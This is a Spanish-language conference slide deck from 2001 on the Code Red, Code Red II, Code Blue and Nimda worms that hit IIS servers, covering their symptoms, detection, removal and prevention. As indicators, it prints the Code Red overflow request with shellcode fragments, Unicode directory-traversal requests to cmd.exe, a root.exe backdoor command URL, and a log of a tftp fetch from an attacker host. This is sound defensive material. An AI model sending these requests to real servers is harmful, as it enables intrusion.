Jornadas Tcnicas RedIRIS 2001 Pamplona, Octubre 2001

1
Jornadas Técnicas RedIRIS 2001Pamplona, Octubre
2001

• IX Grupo de coordinación
• IRIS-CERT
• Últimas tendencias Gusanos en equipos NT

2
Agenda

• Terminología
• Gusanos
• CODE RED (CRv1, CRv2a, CRv2b)
• http//www.cert.org/advisories/CA-2001-19.html
• http//www.cert.org/advisories/CA-2001-23.html
• CODE RED II
• http//www.cert.org/incident_notes/IN-2001-09.html
  
• http//www.incidents.org/react/code_redII.php
• CODE BLUE
• http//xforce.iss.net/alerts/advise96.php
• W32/NIMDA // CONCEPT VIRUS (CV) V 5.
• http//www.cert.org/advisories/CA-2001-26.html
• http//www.incidents.org/react/nimda.pdf
• Medidas preventivas

3
Terminología

• Gusano ? Programa que puede ejecutarse
  independientemente y que se puede propagar a
  otras máquinas.
• The Shockware Rider John Brunner 1975
• Morris Worm (The Internet Worm Incident) 1988
• Virus ? Secuencia de código que se inserta en
  otros programas (hosts). Necesita la
  intervención humana para que se ejecute su
  programa hosts.

4
CODE RED.Sistemas afectados

• Windows NT con IIS 4.0/5.0 y Index Server 2.0
  instalado
• Windows 2000 con IIS 4.0/5.0 y Index Server
  instalado
• http//www.microsoft.com/technet/security/bulletin
  /MS01-044.asp
• http//www.microsoft.com/technet/security/bulletin
  /MS01-033.asp
• Cisco CallManager, Unity Server, uOne, ICS7750,
  Building Broadband Service Manager (instalan IIS)
• Cisco 600 series DSL routers
• http//www.cisco.com/warp/public/707/cisco-code-re
  d-worm-pub.shtml

5
CODE RED.Descripción (CRv1)

• Actividad dependiente de la fecha del sistema
• Día 1-19 ? Actividad de propagación
• Genera direcciones IP aleatorias
• IIS 4.0/5.0 IDA ? infectada
• Cisco 600 series DSL routers ? El router deja de
  reenviar paquetes
• No IIS/puerto 80 abierto ? logea
• Se pueden producir re-infecciones
• Degradación de rendimiento y DoS
• Idioma Inglés (US)? ? Modificación páginas WWW
• Día 20-27 ? DoS contra www.whitehouse.gov
• Día 28-final mes ? Duerme infinitamente

6
CODE RED.Huellas

• En el sistema
• /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNu9090u6858u
  cbd3u7801u9090u6858ucbd3u7801u9090u6858ucb
  d3u7801u9090u9090u9090u8190u00c3u0003u8b00
  u531 bu53ffu0078u0000u00a
• En la red
• Tráfico desde nuestra máquina (infectada) al
  puerto 80/tcp de máquinas aleatorias

7
CODE RED.Variaciones

• CRv2a
• No modifica páginas Web
• Selección de víctimas aleatorias
• CRv2b
• No modifica páginas Web
• Selección de victimas mejorado
• Busca www.whitehouse.gov en DNS

8
CODE RED.Detección y Eliminación

• Aumento carga del sistema
• Aumento conexiones externas al puerto 80/tcp
  hacia direcciones aleatorias (netstat na)
• Code Red FAQ
• http//incidents.org/react/code_red.php
• Gusano residente en memoria ? reiniciar la
  máquina
• No nos salva de posteriores re-infecciones
• El atacante sigue teniendo control total de la
  máquina
• Aplicar parches recomendados
• CodeRedscanner
• http//www.cymru.com/robt/Tools/coderedscanner-2.
  5.tar.gz
• Retina CodeRed Scanner
• http//www.eeye.com/html/Research/Tools/RetinaCode
  Red.exe

9
CODE RED II.Sistemas afectados

• Windows 2000 con IIS 4.0/5.0 y Index Server
  instalado
• Windows NT 4.0 con IIS 4.0/5.0 y Index Server 2.0
  instalado
• http//www.microsoft.com/technet/security/bulletin
  /MS01-044.asp
• http//www.microsoft.com/technet/security/bulletin
  /MS01-033.asp
• Cisco CallManager, Unity Server, uOne, ICS7750,
  Building Broadband Service Manager (instalan IIS)
• Cisco 600 series DSL routers
• http//www.cisco.com/warp/public/707/cisco-code-re
  d-worm-pub.shtml

10
CODE RED II.Descripción

• Chequea si el sistema ha sido infectado con
  anterioridad
• Actividad de propagación
• La agresividad del escaneo depende del lenguaje
  del sistema
• Escaneo de direcciones IP de la misma subred de
  clase A o B (método probabilístico) ? Efectos
  colaterales de saturación
• Copia SYSTEMCMD.EXE (puerta trasera)
• c\inetpub\scripts\root.exe
• c\progra1\common1\systema\MSADC\root.exe
• d\inetpub\scripts\root.exe
• d\progra1\common1\systema\MSADC\root.exe
• Instala troyano explorer.exe (c\ y d\)
• http // IP/c/inetpub/scripts/root.exe/cARBITRARY
  _COMMAND

11
CODE RED II.Huellas

• En el sistema
• GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXu9090u68
  58ucbd3u7801u9090u6858ucbd3u7801u9090u6858
  ucbd3u7801u9090u9090u8190u00c3u0003u8b0
  0u531bu53ffu0078u0000u00a
• En la red
• Tráfico desde nuestra máquina (infectada) al
  puerto 80/tcp de otras máquinas vecinas

12
CODE RED II.Detección y eliminación

• Aumento carga del sistema
• Aumento conexiones externas al puerto 80/tcp
  (netstat na) (IPs vecinas)
• Code Red FAQ
• http//incidents.org/react/code_red.php
• AntiCodeRed2.vbs
• http//www.incidents.org/react/AntiCodeRed2.vbs
• Microsoft
• http//www.microsoft.com/technet/itsolutions/secur
  ity/tools/redfix.asp
• Formatear disco duro
• Reinstalar software (aplicando parches
  recomendados)

13
CODE BLUE.Sistemas afectados

• Máquinas con IIS 4.0/5.0 instalado
• IIS Extended UNICODE Directory Traversal
  Vulnerability
• http//xforce.iss.net/alerts/advise68.php
• GET /.. Encoded characters ../winnt/system32/cmd
  .exe?/cdir

14
CODE BLUE.Descripción

• Reside en memoria
• Instala un Visual Basic Script (d.vbs) que
  elimina el mapeo ISAPI para ficheros .ida,
  .idq, .printer
• Carga una DDL (httpext.dll) y un .EXE
  (svchost.exe)
• Propagación ? escaneo IPs vecinas
• 10 am 11 am GMT ? Ataque de inundación contra
  una IP de China

15
CODE BLUE.Eliminación

• Con Regedit encontrar la clave del registro
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
  entVersion\Run
• Buscar y borrar la entrada del registro para
  c\svchost.exe
• Eliminar los archivos c\svchost.exe y c\d.vbs
• Reiniciar el ordenador
• Aplicar parche recomendado

16
W32/NIMDA.Sistemas afectados

• Microsoft Windows 95, 98, ME, NT y 2000
• Formas de propagarse
• De cliente a cliente (vía mail/recursos de red
  compartidos)
• http//www.cert.org/advisories/CA-2001-06.html
• De servidor Web a cliente (por navegación sobre
  páginas modificadas)
• De cliente a servidor Web
• IIS Extended UNICODE Directory Traversal
  Vulnerability
• http//www.kb.cert.org/vuls/id/111677
• Puertas traseras dejadas por Code Red II y
  sadmin/IIS
• http//www.cert.org/incident_notes/IN-2001-09.html
  
• http//www.cert.org/advisories/CA-2001-11.html

17
W32/NIMDA.Descripción

• Manda copias de sí mismo a todas las direcciones
  encontradas en la libreta de direcciones
• Escaneo de IPs aleatorias siguiendo método
  probabilístico
• Intenta transferirse a máquinas vulnerables (IIS)
  vía tftp (69/udp)
• Recorre todos los directorios en el sistema y se
  copia como README.EML
• Si encuentra archivos .html o .asp incluye código
  Javascript que permitirá propagación al navegar
  por esas páginas
• Crea una cuenta Guest (NT y 2000) perteneciente
  al grupo Administrator
• Activa la compartición de la unidad c\ (C)
• Crea troyanos de aplicaciones legítimas
  previamente instaladas en el sistema

18
W32/NIMDA.Huellas

• GET /scripts/root.exe?/cdir
• GET /MSADC/root.exe?/cdir
• GET /c/winnt/system32/cmd.exe?/cdir
• GET /d/winnt/system32/cmd.exe?/cdir
• GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
  
• GET /_vti_bin/..5c../..5c../..5c../winnt/system
  32/cmd.exe?/cdir
• GET /_mem_bin/..5c../..5c../..5c../winnt/system
  32/cmd.exe?/cdir
• GET /msadc/..5c../..5c../..5c/..\xc1\x1c../..\x
  c1\x1c../..\xc1\x1c../
• winnt/system32/cmd.exe?/cdir
• GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..\xc0/../winnt/system32/cmd.exe?/cd
  ir
• GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
  
• GET /scripts/..2f../winnt/system32/cmd.exe?/cdir
  

19
W32/NIMDA.Detección y eliminación

• Buscar
• root.exe
• Admin.dll
• Ficheros .eml y .nws extraños
• Log
• /ctftp20i20x.x.x.x20GET20Admin.dll20d\Admin
  .dll 200
• x.x.x.x ? máquina atacante
• 200 ? comando realizado con éxito
• Formatear disco duro
• Reinstalar software (aplicando parches
  recomendados)

20
Medidas preventivas

• Instalar sólo los servicios estrictamente
  necesarios
• Permitir acceso sólo a los servidores públicos
• Mantener las máquinas actualizadas con los
  últimos parches de seguridad
• Hotfix (Microsoft)
• http//support.microsoft.com/support/kb/articles/q
  303/2/15.asp?id303215sdtech
• Desactivar extensiones dañinas en IIS
• Lockdown (Microsoft)
• http//www.microsoft.com/technet/security/tools/lo
  cktool.asp
• Bloquear el tráfico HTTP en función de la URL que
  se solicita (Cisco ? nbaracl)
• http//www.cisco.com/warp/public/63/nimda.shtml
• http//www.cisco.com/warp/public/63/nbar_acl_coder
  ed.shtml
• Cambiar el directorio base de la instalación de
  Windows NT
• Chequear/controlar los logs de los servidores Web
• Contestar/actuar rápidamente ante denuncias.

21
(No Transcript)